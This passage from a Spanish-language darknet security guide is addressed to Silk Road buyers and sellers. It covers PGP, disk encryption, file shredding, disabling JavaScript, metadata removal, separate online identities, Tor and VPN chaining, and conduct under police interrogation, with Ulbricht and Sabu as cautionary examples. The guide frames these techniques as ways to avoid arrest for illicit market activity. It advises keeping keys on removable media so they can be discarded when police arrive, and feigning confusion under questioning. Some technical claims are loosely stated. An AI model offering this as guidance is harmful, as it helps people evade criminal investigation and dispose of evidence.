privadas en el disco duro, manténgalas FUERA del ordenador. Si se pierde la clave privada, nunca podrá recuperarla, incluso si se crea otra clave personal con la misma contraseña. Cada clave privada es única para el momento en que se creó y, si se pierde, se pierde para siempre. Una vez que se haya hecho esto, se habrá guardado la clave personal para usarla en el futuro una vez que reinicie Tails. Recordando que Tails no está instalado en el disco duro, por ello cada vez que se reinicia Tails se pierden todas las claves que pudiese tener. Al guardar las llaves en una unidad USB o tarjeta SD, se pueden importar para usarlas cada vez que se reinicie Tails. Ahora, querremos aprender a cifrar y descifrar mensajes con la clave. Bueno, afortunadamente, Tails ya ha hecho un tutorial sobre cómo cifrar y descifrar mensajes. ## Encriptación completa del disco duro y sus archivos Ahora que hemos descubierto PGP, recordamos de nuevo que usar PGP siempre que sea posible es muy, muy importante. Una de las trampas que pusieron a Silk Road es que algunos de los administradores, incluido el propio Ross, no siempre se comunicaban utilizando el cifrado PGP. Una vez que Ross fue arrestado, tenían acceso a los servidores y los portátiles, y todo lo que no estaba encriptado, estaba abierto pudiendo ser revisado. La mayoría de los usuarios de Silk Road creen que Ross había almacenado información personal sobre algunos de los administradores y moderadores en el ordenador en texto plano, lo que se utilizó para realizar 3 arrestos más de usuarios de Silk Road. Una de las razones por las que se sugiere que se guarden las llaves PGP y otros datos confidenciales en una tarjeta SD es que si llega ese día en que está comprometido y se recibe un golpe en su puerta, tenemos tiempo para deshacernos de una Tarjeta SD o unidad USB rápidamente. Aún mejor, si tenemos una tarjeta micro SD que se conecta a un adaptador SD, podemos incluso esconderla. Estate siempre preparado. Nuestro siguiente tema nos lleva a algo llamado Whole Disk Encryption o Full Disk Encryption. A partir de ahora nos referiremos a él como FDE (Full Disk Encryption). Tails tiene una función FDE incorporada, que es otra razón por la que recomendamos el uso de Tails. Tiene muchas de estas características para protegerte. Esencialmente FDE protegerá la unidad, ya sea SD o USB de las personas que pueden venir a buscarnos algún día. El método en el que lo hace es formatear la unidad y reescribir el sistema de archivos de forma cifrada, de modo que solo pueda acceder a ella quien tenga la contraseña. Si olvidamos la contraseña, al igual que pasa en PGP, no podremos recuperarlo. La única opción es formatear el disco y comenzar de nuevo. ¡Así que asegúrate de recordarlo! Y por favor, por el amor de Dios, Alá, Buddah, etc ... no guardes la frase de contraseña en el disco duro. El tutorial sobre cómo podemos cifrar nuestro disco, podemos encontrarlo aqui. > Usa PGP cuando te comuniques con otros en la DarkNet La trituración de archivos es extremadamente importante y este es el motivo de que sea el próximo tema. Si eliminamos un archivo de el ordenador, solo estamos eliminando el lugar donde se encuentra en la unidad. Todavía está en la unidad real, solo se han eliminado los datos de ubicación. Si utilizamos una herramienta de recuperación de archivos, podemos recuperar virtualmente cualquier archivo que se haya eliminado recientemente. La trituración de archivos combate esto sobrescribiendo archivos en su lugar. La idea es que en lugar de eliminar la ubicación del archivo, debemos sobrescribir el archivo con datos aleatorios para que no se puedan recuperarse. Hay mucho debate sobre si se puede sobreescribir un archivo una vez, o si se necesita hacerlo varias veces. Supuestamente, la NSA recomienda 3 veces, el Departamento de Defensa recomienda 7 veces, y un documento antiguo de un hombre llamado Peter Gutmann escrito en los 90 se recomienda 35 veces. Personalmente, creo que entre 3-7 veces es suficiente, y varias personas creen que 1 vez hará el trabajo. El razonamiento detrás de esto es que algunas personas creen que el disco puede perder algunos archivos la primera vez que los escribe y para ser más completos, debe hacer múltiples pasadas. Haz lo que te parezca más cómodo, pero incluso creo que 3 pases serían suficientes, aunque no pasaría de vez en cuando para ejecutar 7 pases y simplemente dejarlo durante la noche. Estos programas pueden eliminar los archivos de la Papelera de reciclaje, eliminar los archivos temporales de Internet e incluso borrar el espacio libre en disco para asegurarnos de que todo esta limpio. Siempre necesitas pensar, ¿tengo algún material sensible en mi disco duro? Si es así, tal vez debas destruir el espacio libre en el disco. Al vaciar la Papelera de reciclaje, siempre debemos usar una trituradora. Cuando sólo borras menos de 1 GB a la vez, podemos hacer fácilmente 7 pasadas rápidamente. Para poner esto en perspectiva, el líder de un grupo llamado nombre LulzSec Topiary ha sido excluido como parte de su sentencia de utilizar cualquier tipo de aplicación de trituración de archivos para que si el FBI quiere controlarlo, puedan hacerlo. La trituración de archivos mantiene los archivos borrados , realmente eliminados. Algunas aplicaciones de trituración de archivos que podemos usar son: dban , fileshredder, priform . ## Vulnerabilidades JavaScript y Eliminación de Metadatos personales desde archivos Antes de comenzar a eliminar metadatos dañinos de sus archivos, quiero hablar sobre otra vulnerabilidad a nuestras capacidades de exploración llamada Javascript. A mediados de 2013, una persona en Irlanda brindaba alojamiento a personas que hospedaban servicios "ocultos", incluida una plataforma segura de correo electrónico llamada Tor Mail. Desafortunadamente lo arrestaron por un cargo relacionado con la pornografía infantil y confiscaron todos sus servidores. Ya sea que esté o no relacionado con pornografía infantil. Las autoridades terminaron inyectando Javascript malicioso en los servidores para que los usuarios visitaran ciertos sitios, este código malicioso se ejecutaría en sus servidores y revelaría información sobre sus computadoras a las autoridades. Le sugiero que lea el siguiente artículo para obtener más información al respecto. Dicho esto, es posible que deseemos deshabilitar Javascript en los navegadores, especialmente cuando visitamos ciertos sitios web de las DarkNet que podrían verse comprometidos algún día. Muchos usuarios se niegan a visitar el sitio web original de Silk Road y los foros con Javascript habilitado porque las autoridades probablemente han podido inyectarlo con Javascript malicioso para identificar a los usuarios. En Tails, el navegador se llama Iceweasel y cuando Tor se ejecuta en Windows, usa Firefox. Ambos navegadores pueden deshabilitar Javascript utilizando el mismo método. Abra una ventana y escriba el siguiente comando en la barra de direcciones, "about: config" y haga clic en el botón que dice "Tendré cuidado, lo prometo". :) Esto abrirá una serie de configuraciones que incluyen una barra de búsqueda en la parte superior. Buscamos javascript en la barra de búsqueda y sus dos entradas, "javascript.enabled" y "browser.urlbar.filter.javascript". Clic derecho sobre ellos y clic en "Alternar", verá el valor cambiado a falso. Si se desea habilitar Javascript nuevamente, simplemente hacemos clic en Alternar nuevamente y veremos que el valor vuelve a ser verdadero. De nuevo, recordamos que, cada vez que reiniciemos Tails tendremos que hacer esto de nuevo, así que hágamos el hábito de hacerlo todo el tiempo. Nunca se sabe cuándo nuestro sitio web favorito podría verse comprometido. Tras ver la importancia de JavaSript, pasamos a los metadatos. Hay una pequeña historia famosa sobre un hacker online llamado w0rmer que tomó fotos de su novia y las publicaría onlínea en un defacement de una página web. Lo que olvidó, o no sabía, era que las fotos tomadas con el iPhone y otros teléfonos inteligentes guardan las coordenadas GPS de donde se tomó la imagen y la almacenan en los metadatos de la imagen. ¡Necesitas eliminar estos metadatos! De lo contrario, podríamos terminar en una prisión federal con w0rmer. Afortunadamente, Tails tiene una solución para esto. ¿Ves por qué amo a Tails?.Podemos ver cómo funciona,aqui. Ten en cuenta los formatos actualmente compatibles. En términos de imágenes, jpg, jpeg y png. Pero, desafortunadamente, MAT no es perfecto y no solo confiaría en él, por lo que una buena idea sería nunca subir fotos tuyas o de tu pareja onlínea, especialmente alardeando de un hack cometido. ## Precauciones generales de seguridad al publicar online, aprender de los errores de otros Hablaremos a continuación sobre buenas prácticas al usar TOR, Tails y otros servicios de la DarkNet. En primer lugar, es muy recomendable utilizar múltiples identidades online para diferentes cosas. Si eres es un comprador y un vendedor en Silk Road, es posible que desees tener inicios de sesión separados para esto. Y luego posiblemente un tercer inicio de sesión para los foros. O si quieres ser parte de otro mercado, entonces quizás deberias tener un cuarto acceso. Bueno, Tails tiene otro buen programa ofrecido por Tails que se llama KeePassX. Cuando tenemos varios inicios de sesión, es difícil hacer un seguimiento de todos ellos, por lo que podría ser una buena idea mantenerlos todos en 1 documento cifrado con una contraseña segura. KeePassX puede ayudarte con esto, como podemos ver. Nunca deseamos usar apodos o ubicaciones, o cualquier otra cosa relacionandon la vida online con la pública. Otra cosa que debes adoptar son nuevas formas de movernos. Si generalmente eres un tipejo desordenado, que comete los mismos errores de gramática, o los mismos errores de ortografía todo el tiempo, esto puede usarse para identificarte. Siempre verifica todo lo que publiques públicamente o en privado, porque las autoridades siempre encontrarán maneras de relacionarte con ello. Con Ross Ulbricht, encontraron una publicación anterior que publicó en un foro cuando comenzó Silk Road preguntando a la gente si habían oído hablar de un mercado llamado Silk Road. Obviamente, este es un viejo truco utilizado por las personas que tratan de difundir la conciencia sobre un nuevo proyecto suyo. Más tarde se identificó diciendo que estaba buscando programadores y dio su dirección de correo electrónico privada en el mismo foro con el mismo nombre. Si siempre escribes mal las mismas palabras, si siempre utilizas los mismos términos de argot, escribes en mayúscula las mismas palabras, usas una cierta cantidad de períodos después de un etc .... o siempre usas la misma cantidad de !!!!! , todas estas cosas dan una sospecha razonable y es más fácil atribuir las cosas a alguien. Una vez que te tienen bajo su radar, solo te costará un par de errores ¿entiendes?. Piensa en el tiempo que usa el ordenador. ¿Es fácil correlacionar la zona horaria según el momento en que te conectas? ¿O es más aleatorio? ¿Tiene patrones que son predecibles? Siempre piensa en estas cosas cuando publiques online. Siempre piensa en qué tipo de personalidad estas presentando sobre el nombre online. Espera que cada palabra que escribas online sea leída por las autoridades. Para ellos, esto es mucho más fácil que rastrear a los señores de la droga en las calles. Se sientan en una oficina y leen mensajes en un foro e intentan establecer conexiones. No subestimes a las autoridades. Siempre trata todo como si estuviese comprometido, siempre trata a todos como si estuviesen comprometidos y nunca pienses que alguien va a ir a la cárcel por ti. Si alguien puede evitar 10-20 años al delatarlo, lo hará en un instante. El ejemplo perfecto es Sabu de LulzSec. Después de que fuera arrestado y se enfrentase a 112 años en la cárcel, le hicieron un trato para ayudarlos a delatar a sus amigos que terminó con múltiples arrestos de los mismos. Incluso las personas que son tus amigos te darán la espalda cuando se trata de su libertad. ## Datos EXIF Olvidé mencionar arriba cuando hablo de metadatos, que cuando se trata de fotos, hay otro riesgo involucrado llamado datos EXIF, esta es otra forma de metadatos específicamente relacionada con las imágenes y no pueden ser eliminado correctamente por Metadata Anonymisation Toolkit mencionado anteriormente. Los datos EXIF nos cuenta el formato de archivo de imagen intercambiable y afectan a los archivos JPG, JPEF, TIF y WAV. Una foto tomada con una cámara habilitada con GPS puede revelar la ubicación exacta y el momento en que se tomó, y el número de identificación único del dispositivo, todo esto se hace de manera predeterminada, a menudo sin que el usuario lo sepa. En diciembre de 2012, el programador anti-virus John McAfee fue arrestado en Guatemala mientras huía de una supuesta persecución en Belice, que comparte una frontera. La revista Vice había publicado una entrevista exclusiva con McAfee "en marcha" que incluía una foto de McAfee con un vicepresidente tomada con un teléfono que había etiquetado geográficamente la imagen. Los metadatos de la foto incluían coordenadas GPS para ubicar a McAfee en Guatemala, fue capturado dos días después. Para evitar esto, solo toma fotos que usen PNG, porque no almacenan datos EXIF. Para verificar si una foto contiene datos EXIF reveladores, visita este sitio. O podemos descargar una herramienta haciendo una búsqueda rápida online para ver qué datos EXIF pueden contener las fotos antes de subirlas. Ten mucho cuidado con los archivos que cargues online, porque nunca se sabe qué tipo de datos dañinos se pueden adjuntar en ellos. Es útil usar Tails, pero siempre considera todo lo que pongas online como una posible prueba para usar en tu contra y siempre prepárate para el día en que las autoridades lleguen a nuestra puerta. ## Necesito un abogado, captura e interrogatorio Enfrentémoslo. Todos somos humanos y cometemos errores. Desafortunadamente, solo necesitamos cometer un error, y aplicaran la ley. Quizás esperen que hagas algo más serio antes de que te atrapen, pero si te equivocas y sienten que vales la pena, con raras excepciones puedes esperar que te atrapen sin importar dónde vivas. ¿debería tener a mano un teléfono de abogado de emergencia? La respuesta: Si. Una vez arrestado, pueden confiscar tu dinero basándose en la suposición de que está relacionado con las actividades ilicitas. Por ellos, necesitamos tener un abogado pagado por adelantado. De esta forma, en el desafortunado caso de que recibamos una visita de las autoridades, tendríamos abogado. A continuación, hablaremos sobre qué hacer en caso de ser interrogado. Básicamente. Mantenga la boca cerrada. las autoridades van a probar todo tipo de tácticas para que admitas la culpabilidad de los crímenes de los que te acusan. Es probable que usen el policía bueno, el policía malo contigo. Primero le dirán que quieren ayudarlo, y que buscan a los grandes. Solo necesitan tu ayuda para alejar a los grandes. No escuches esto, nunca he cooperado con un buen policía y que termine trabajando a mi favor. Una vez que admitas ser culpable, puede despedirte de tu libertad. En segundo lugar, si te niegas a cooperar, la actitud cambiará a policía malo. Ellos dirán: "Muy bien, ¿no quieres cooperar? Traté de ayudar, pero ahora vas a tener un montón de problemas. ¿Tiene alguna idea de a qué tipo de cargos te enfrentas? Te vas a ir por un largo tiempo a menos que empieces a hablar". Intentarán y te asustarán para que admitas tu culpa. De nuevo, mantén la boca cerrada y continúa solicitando un abogado. Nunca hables sin un abogado presente y nunca hagas nada que no tengas que hacer legalmente. Si tiene derecho a permanecer en silencio, entonces utiliza ese derecho. Sé que hay algunas circunstancias en las que no tienes ese derecho, pero a menos que sea así, es mejor que te mantengas en silencio. Tercero, abandona la actitud. No discutas con los policías sobre no tener nada contigo, o algo por el estilo. Actúa asustado, ansioso y confundido. Actúa como si no tuvieras idea de lo que está pasando y que tienes miedo de tu vida. Dile a la policía que te están asustando y que quieres ver a tu abogado porque no sabes de qué se trata. Necesitan pruebas y pruebas sólidas para acusar de un delito. Intentarán correlacionar las publicaciones realizadas en los foros, los números de teléfono llamados, tal vez un paquete enviado al hogar, todas las formas de comunicación, transferencias bancarias, etc., hasta que encuentren la manera de vincularte con el delito. Te están acusando. Pero la evidencia más grande siempre será la disposición a admitir la culpa por una pena menor. Cuando Sabu descubrió que se enfrentaba a 112 años en una prisión federal, rápidamente "largo" todo y comenzó a trabajar para las autoridades. Una vez más, habla con tu abogado, descubre las pruebas en tu contra y solo responde las preguntas que tu abogado te recomiende que respondas, y respóndalas de la manera en que tu abogado te aconseje que las responda. Trata de ser lo más honesto posible con tu abogado. Tu abogado no puede y no compartirá ninguna admisión de culpa que tengas con los fiscales , esto se llama privilegio de abogado-cliente. ## Combinando TOR con una VPN ¿Debería usar una VPN con TOR? ¿Debo usar TOR para conectarme a una VPN, o usar una VPN para conectarme a TOR? Permítanme decir, en primer lugar, que cuando se navega por Internet sin TOR, probablemente deberíamos estar utilizando una VPN, independientemente de si estamos utilizando TOR o no. Debemos asegurarnos de que la VPN también usa alguna forma de encriptación. Todas las redes, pero especialmente las redes wifi públicas, son vulnerables al análisis del tráfico. Si combinamos esto con el hecho de que algunos proveedores de servicios de Internet controlan tu actividad hasta cierto nivel, podemos ver por qué podría ser una buena idea usar siempre un método cifrado para usar Internet. Por lo menos, para proteger la información personal cuando ingresemos tarjetas de crédito, nombres de usuario y contraseñas, así como otros datos personales online. De nuevo, especialmente si estamos usando una red wifi pública. Elegir una VPN que use al menos un cifrado de 128 bits como TOR es una buena práctica, y detendrá a la mayoría de los espías. Pero si puedes obtener encriptación de 256 bits, mucho mejor. Antes de entrar en la cuestión de si deberíamos usar una VPN junto con TOR, quiero advertirte brevemente sobre cómo debería usar una VPN. Si vas a utilizar una VPN para cualquier tipo de lucha de libertad, asegúrate de que tu VPN no mantenga los registros. Esto es realmente mucho más difícil de lo que piensas. Muchos proveedores de VPN alegarán no mantener registros de su actividad para poder ganarte como cliente, porque tienen que competir con los demás proveedores. Los clientes tenderán hacia los proveedores que no ofrecen retención de datos de identificación. Desafortunadamente, este reclamo de ellos no siempre es el caso real y mostraremos un ejemplo. Existe un conocido proveedor de VPN llamado HideMyAss que anteriormente afirmaba no mantener registros de sus usuarios. Lamentablemente, cuando se vió con una orden judicial del gobierno en el Reino Unido, entregaron pruebas de un presunto Hacker de LulzSec que ayudó a su arresto, como podemos ver. Una de las citas para llevar a casa de este artículo es la siguiente. > No nos sentimos intimidados por el gobierno de los EE. UU. Como afirman algunos, simplemente estamos cumpliendo con el sistema legal de nuestros países para evitar que nos cierren y enjuicien. Un hombre muy inteligente que utiliza el manejo online The Grugq, dijo que cuando luchas por la libertad online, nadie va a ir a la cárcel por ti, algo 100% correcto. Cuando se trata de eso, ningún proveedor de VPN va a arriesgarse a ir a la cárcel para proteger a un suscriptor que paga 20€ al mes. No importa cuán duras parezcan, no importa cuánto pretendan cuidar de proteger a sus clientes, cuando se enfrenten con la opción de renunciar o ir a la cárcel, siempre elegirán la libertad. Otra cosa a tener en cuenta, sin embargo, es el uso de una VPN para ocultar tu actividad de Internet del proveedor de servicios de Internet. Esto también puede ocultar el hecho de que se está utilizando TOR, lo que puede hacer sospechar cuando las autoridades comienzan a pedirles a los ISP que proporcionen datos sobre sus usuarios. Esto puede o no ser relevante, ya que muchas personas usan TOR y podremos argumentar que hay muchas razones legítimas para usar TOR. Pero es solo otro factor para despertar sospechas que pueden o no entrar en juego y deben ser consideradas. Si eliges utilizar TOR sobre una VPN, los beneficios son que estarías otra vez, ocultando a tu ISP el hecho de que estás usando TOR. Además, tu VPN solo podrá ver que se está conectando a nodos TOR y que está enviando datos encriptados. La VPN no podrá ver qué datos está enviando a través de TOR a menos que lo descifren, recuerda , toda la información retransmitida a través de TOR está encriptada. Las desventajas, por supuesto, como se mencionó, son que los proveedores VPN pueden o no registrar todo lo que haces en forma de metadatos o incluso contenido si tienen la capacidad de almacenamiento, y mantener esos registros a mano durante mucho tiempo. En este caso, no es mejor que conectarse a TOR a través de un ISP. Otra cosa que debe mencionarse a aquellos que usarán VPN cuando no usen TOR, pero también usarán VPN cuando usen TOR, es recordar cuándo y cuando no están conectados a su VPN. A veces las conexiones VPN pueden desconectar inesperadamente y es posible que ni siquiera te des cuenta de ello. Si la razón por la que estas utilizando una VPN es para ocultar la actividad TOR del ISP, si nuestra VPN cae, el ISP comenzará a ver tráfico TOR. O tal vez te olvides de que estás conectado a tu VPN y termines indicando tu dirección en Google Maps para encontrar direcciones en algún lugar. Bueno, ¿adivina qué hace Google con todos los datos ingresados en su sistema? Lo conservan, y probablemente lo mantengan indefinidamente. Entonces, si un día la NSA nos identifica en la red TOR ocupando una gran cantidad de nodos y usando el análisis de tráfico para identificarlo en función del análisis estadístico, nos vinculará a nuestra dirección IP VPN. En este punto, es probable que le pidan a la VPN que entregue datos sobre sus usuarios, pero si la VPN se niega a cumplir porque no están sujetos a la ley de un determinado pais, pueden consultar algunos de los sitios web de mayor monitorización, para ver si navegamos y usamos esa dirección IP para cualquier otra cosa online. Comprobarán los registros de Google, Yahoo, Facebook, Twitter, Netflix y otras compañías de recopilación de grandes volúmenes de datos para ver quién ha estado usando esa dirección IP para conectarse a sus servidores. Si accidentalmente ingresamos la dirección en Google cuando nos conectamos a esa VPN, somos sospechosos. Así que siempre ten esto en cuenta. El hecho de estar detrás de una VPN no significa que no se pueda rastrear por un error humano. Los beneficios de TOR son que obtienes una identidad nueva cada vez que te conectas. Este puede o no ser el caso con nuestra VPN, así que por favor verica y asegúrate de cómo estas conectado. ## Montando una TOR sobre una VPN Bien, ahora hablemos sobre por qué es posible que deseemos conectarnos a una VPN sobre TOR. El flujo de datos se vería así. Nosotros -> Tor -> VPN -> Internet Los beneficios de hacerlo son los siguientes. Eres más anónimo con tu VPN en caso de mantener registros, o si haces algo con la VPN que no debes y un sitio web o servidor toma nuestra dirección IP VPN. En el caso de que esto suceda, incluso si la VPN logra mantener registros de todo lo que hacemos, solo pueden identificarnos como un usuario de TOR anónimo, siempre y cuando no hayamos comprado el servicio como un idiota con nuestra tarjeta de crédito o cuenta de Paypal. Si usamos Bitcoin y nos aseguramos de que el camino de Bitcoin no sea fácil de rastrear, deberíamos estar protegidos. Algunos sitios web bloquean que los usuarios de TOR se conecten a sus sitios web o servidores, al usar nuestra VPN para aparecer como nodo de salida, estamos ocultando nuestra actividad con TOR del sitio web visitado y, con suerte, omitiendo dichos filtros. [Imagen: VPN más TOR] Otra ventaja, es que si nuestra conexión VPN cae, su caída será nuestra dirección IP TOR en lugar de nuestra dirección IP real. Y finalmente, si pasamos a través de un nodo de salida TOR comprometido, nuestra información permanecerá encriptada a través del protocolo de cifrado de la VPN hasta que llegue al nodo de salida de la VPN. Esto es bueno si está pasando por un nodo de salida comprometido, pero no olvide que la VPN podría estar registrando todo lo que está haciendo de todos modos. > ¡No confíes en nadie que tenga acceso a tus datos no cifrados! Algunas de las desventajas de hacer las cosas de esta manera, como se menciona anteriormente, es que nuestro ISP sabe que estamos utilizando TOR, cuándo y durante cuánto tiempo. Esto puede o no importarnos, pero es solo algo a considerar. En segundo lugar, no podremos visitar sitios web de servicios ocultos. ¿Recuerdas aquellos sitios .onion de los que hablamos al principio? Debemos estar conectado a la red TOR para visitar esos sitios web de servicios ocultos. Pero estoy conectado a TOR ¿no? Sí, lo estamos, pero nuestro método final de comunicación con Internet no proviene de la red TOR, proviene de nuestra VPN. Y nuestra VPN probablemente no está configurada para TOR. Para que podamos conectarnos a un Hidden Sevices, debemos estar conectado directamente a TOR o usar una VPN para conectarnos a TOR. TOR debe ser nuestro nodo final de conectividad para visitar sitios web .onion. La elección depende de ti, y cada persona en cada estado, provincia y país tendrá diferentes motivos para querer usar VPN -> TOR o TOR -> VPN, o simplemente TOR, o simplemente VPN. Cualquiera que sea la elección que hagamos, debemos tener en mente todas las cosas mencionadas. Ninguno de estos métodos nos salvará si ingresamos algo que nos identifique online. No inicies sesión en tu cuenta de Facebook con nuestra VPN. No revises el correo electrónico ni busques una dirección cercana en Google usando la VPN. De hecho, aléjate de Google por completo a menos que sea absolutamente necesario. Hay otros dos motores de búsqueda ahora que no almacenan información sobre sus usuarios. 1. DuckDuckGo. Tienen una URL de clearnet y una URL de servicios ocultos para ambos tipos de usuarios. - duckduckgo.com - 3g2upl4pq6kufc4m.onion - Ten en cuenta que el espejo de Hidden Services no es HTTPS 1. StartPage. Este servidor tampoco almacena ninguna información sobre sus usuarios. - startpage.com Antes de continuar, quiero volver a cómo elegir una buena VPN. Cuando busque un proveedor de VPN, lo más probable es que encuentre dos protocolos para elegir. Averigüe cuál utiliza su proveedor de VPN antes de registrarse con ellos. PPTP y OpenVPN. En este momento, recomendamos encarecidamente eviter PPTP, quedendonos con los proveedores de OpenVPN. Podemos ver una comparación rápida. Como podemos ver, PPTP utiliza un cifrado más débil, de 128 bits frente a 160 bits a 256 bits para OpenVPN. Ofrece seguridad básica frente a un alto nivel de seguridad utilizando algo llamado certificados digitales. Esto es básicamente una forma de asegurarnos de que los datos que llegan se envíen desde nuestro proveedor VPN y no sean inyectados por terceros malintencionados porque los datos entrantes y salientes se firman utilizando certificados especialmente obtenidos, similares a mostrar nuestro ID para entrar en un área restringida . El único inconveniente es que la configuración de OpenVPN puede ser un poco difícil para los usuarios menos técnicos, pero hay muchos tutoriales online para configurar proveedores de OpenVPN y nuestro proveedor de VPN probablemente también nos ayude a configurarlo. PPTP ha sido abandonado por aquellos que exigen el más alto nivel de seguridad, por lo que recomendaría evitarlo. Una tercera opción para los proveedores de VPN es L2TP / IPsec, pero muchos usuarios creen que también ha sido comprometida por la NSA debido a sus niveles más débiles de cifrado y también debemos evitarla. Debemos usar OpenVPN. Por último, si deseamos saber cómo conectarnos a TOR a través de una VPN. Si estamos utilizando OpenVPN, es realmente simple. Asegúrate de estar conectado a la VPN, verifica tu dirección IP en cualquier sitio web como WhatIsMyIpAddress para asegurarnos que haya cambiado. Luego, abrimos TOR o TAILS y comenzamos a usar TOR y ya estaríamos conectados a TOR a través de una VPN. Conectarse a una VPN por TOR es más complicado, ya que OpenVPN reconfigura las rutas de la red para que TOR no pueda ejecutarse en el mismo host. Tan pronto descubramos un tutorial, o si alguien puede compartir una forma fácil de conectar una VPN a TOR que la comparta. Actualmente solo los usuarios de Windows pueden usarlo. ## Conexión TOR -> VPN para usuarios Windows Después de una larga búsqueda, hemos encontrado una forma de conectar TOR -> VPN. No es perfecta, y algunos pueden no estar de acuerdo con hacer las cosas de esta manera, pero funciona y se muestra como una opción, pero solo funciona para los usuarios de Windows en este momento. Si retrocedemos en el post, ya hablamos sobre la combinación de VPN y TOR, donde encontrarás las razones por las que querrías hacerlo y algunas de las razones por las que no querrías hacerlo. Pero no pude proporcionar una forma de conectarse a una VPN usando TOR para que la VPN no sepa quién eres. Cuando se trata de TOR -> VPN, si no puedes confiar en tu VPN, lo cual raramente deberías, mantener la identidad anónima desde nuestra VPN es una buena idea. Además, con cada vez más personas que usan TOR, con alrededor de 4000 nodos de salida TOR, muchas de las direcciones IP del nodo de salida se marcan como spammers en sitios web populares y se limita el uso de usuarios TOR con buenas intenciones para publicar en foros. La forma en que se descubrio que se puede hacer TOR -> VPN es usando una máquina virtual, preferiblemente Virtual Box y ejecutando otra instancia de Windows, preferiblemente una que usa menos memoria que la versión actual. Deseamos ejecutar TOR Expert y Tortilla en su sistema operativo anfitrión. Configura su Virtual Box para enrutar todo tu tráfico de red a través de Tortilla (adaptador Bridge), que lo enruta a través de TOR. Actualmente, Tortilla solo es compatible con Windows, por lo que esta opción solo está disponible para los usuarios de Windows en este momento. El vídeo que acompañaba a este apartado ya no está disponible en YouTube. Ahora que tenemos nuestra máquina virtual de Windows ejecutándose en TOR, podemos instalar una VPN de nuestra elección, preferiblemente una que use OpenVPN en nuestro sistema operativo anfitrión de Windows y se conecte a ella. Verifica la dirección IP antes de la conexión y después, deberíamos ver una dirección IP diferente. Si todo ha ido bien, ahora tenemos una máquina virtual ejecutando TOR -> VPN. Si deseamos agregar otra capa, podemos descargar el paquete de navegador TOR en nuestra máquina virtual y ejecutar eso también, dándole TOR -> VPN -> TOR para otra capa de seguridad. Y, además tenemos la opción de usar este método para usar una VPN en el sistema operativo host, mediante Tor Expert con Tortilla, además de otra VPN en nuestro sistema operativo anfitrión y el navegador TOR, que nos proporciona VPN -> TOR -> VPN -> TOR. No estoy abogando por ningún método, debes tomar esa decisión por tu cuenta, solo damos el conocimiento necesario para tomar una decisión informada y finalmente poder elegir el método con el que nos sentimos más cómodos. A veces, hacer TOR -> VPN es necesario motivados por los filtros de correo no deseado que mencionados anteriormente y otras veces teniendo TOR, ya que nuestro último nodo en Internet es necesario, como cuando se accede a la red .onion. Depende completamente de ti, sé que estamos tratando de evitar el uso de Windows debido a todos los exploits y otras razones de las que hablamos en las publicaciones anteriores, pero si no tienes otra forma de permanecer anónimo desde tu VPN, es un buen compromiso hasta que tengamos algo como Tortilla que sea compatible con las distribuciones de Linux. ## Cookies de rastreo Un artículo reciente explica cómo la NSA usa cosas como Google Ads y otras cookies de rastreo para identificar a los usuarios por encima de los términos de referencia cuando hacerlo de otra manera no es posible. Para aquellos que no sepan de lo que estamos hablando, déjenme preguntarles esto. ¿Alguna vez has notado que ciertos anuncios parecen seguirte de un sitio web a otro? Tal vez, ¿algo que buscó en Google o Yahoo ahora aparece en anuncios en otras páginas? Esto fue diseñado originalmente para comercializar cosas en función de nuestras preferencias instalando cookies de rastreo en el navegador. Afortunadamente, TOR borra todas nuestras cookies cada vez que reiniciamos el navegador sí lo hacemos con Tails, pero eso no significa que no seamos vulnerables dentro de la misma sesión de TOR. Lo que quiero decir con esto es: digamos que fuiste e hiciste un poco de "libertad" luchando en un foro en algún lugar y que luego, usando la misma sesión Tor, visitaste otro sitio web con Google Ads en él. Google puede usar estas cookies de seguimiento para conocer nuestro comportamiento de navegación. Nuestros términos de búsqueda, nuestros sitios preferidos, etc. Algunas personas son lo suficientemente estúpidas como para usar la misma dirección IP de TOR e ir a comprobar su feed de noticias de Facebook o su correo electrónico. ¿Adivina quién se "acuesta" con las autoridades? Google, Yahoo, Facebook, MSN y todos nuestros proveedores de correo electrónico también. Recuerda, cuando empiecse a dejar patrones, comenzarán a buscar similitudes que empiecen con solo una sospecha. Tal vez correlacionaron las publicaciones del foro de la lucha por la libertad con nosotros porque ingresamos a nuestro correo electrónico, y comienzan a notar que siempre escribes mal las mismas palabras, cometes los mismos errores de gramática, los mismos términos de la jerga. Tal vez visitaste un sitio web perteneciente a alguien "local" con anuncios de Google en él. No estamos del todo seguro de cómo pueden usar estas cookies de rastreo para identificarnos, pero el punto es que guardan todo. Y si haces algo estúpido como buscar un restaurante local en Google o qué películas se reproducen en tu área local con la misma dirección IP que hiciste algo que no deberías haber hecho antes, Google podrá juntar 2 y 2. Una vez que están en tu camino, estás jodido. ¡Así que no les des nada para correlacionarte contigo! Pregúntate, ¿no puedo simplemente desactivar todas las cookies? Sí, podríamos hacerlo, pero se requieren cookies para cosas como las sesiones de inicio. Sin cookies, no podríamos mantener un estado de inicio de sesión en ciertos sitios web, ya que utilizan esa ID de cookie para identificar la sesión en el servidor. Una vez más, definitivamente podemos desactivar las cookies, pero no podremos mantener un inicio de sesión en cualquier lugar. ## Aprendiendo de los errores de los otros. LIBERTAS, DPR, SABU, LULZSEC Finalmente se comfirmó, Libertas (Gary Davis), uno de los 3 moderadores detenidos de Silk Road, ha sido liberado bajo fianza recientemente según un artículo. El motivo por el que menciono esto, es que debemos recordar a todos los usuarios los errores cometidos por Ross y los otros tres moderadores, para poder aprender de ellos. Debemos evitar este tipo de errores, nunca NUNCA le proporcionemos a nadie información personal online. Según la historia, Ross exigió a los moderadores que le dieran copias de sus identificaciones para convertirse en moderadores de Silk Road, y probablemente guardara un registro de estos en el ordenador. Desafortunadamente, estos pasaron a manos del FBI y arrestaron como resultado a 3 moderadores. Y ahora, según el artículo, también persiguen a los vendedores principales. Utiliza siempre el cifrado PGP en todas tus comunicaciones, lo que lamentablemente en este caso no hubiera importado porque Ross terminó cediendo sus llaves privadas a las autoridades. Pero sigue siendo otro obstáculo en su camino para protegerte de que te quiten tu libertad. Nunca proporciones información personal a nadie online sobre ti. Nunca pongas tu confianza en las manos de otra persona, porque al final del día, nadie irá a la cárcel por ti. Este mismo escenario ocurrió con Sabu de LulzSec, que fue amenazado con 112 años de prisión, se volvió rápidamente contra sus amigos y trabajó con las autoridades para encerrarlos a todos para ayudar a reducir su sentencia. Sabu tiene 2 hijos y, obviamente, decidió que preferiría sobornar a sus amigos y tener la oportunidad de ser padre en lugar de pasar el resto de su vida encerrado en la cárcel. De nuevo, nadie irá a la cárcel por ti. ### SABU se convirtió en hermano de Jeremy, informante del FBI El día después de Navidad, sup_g 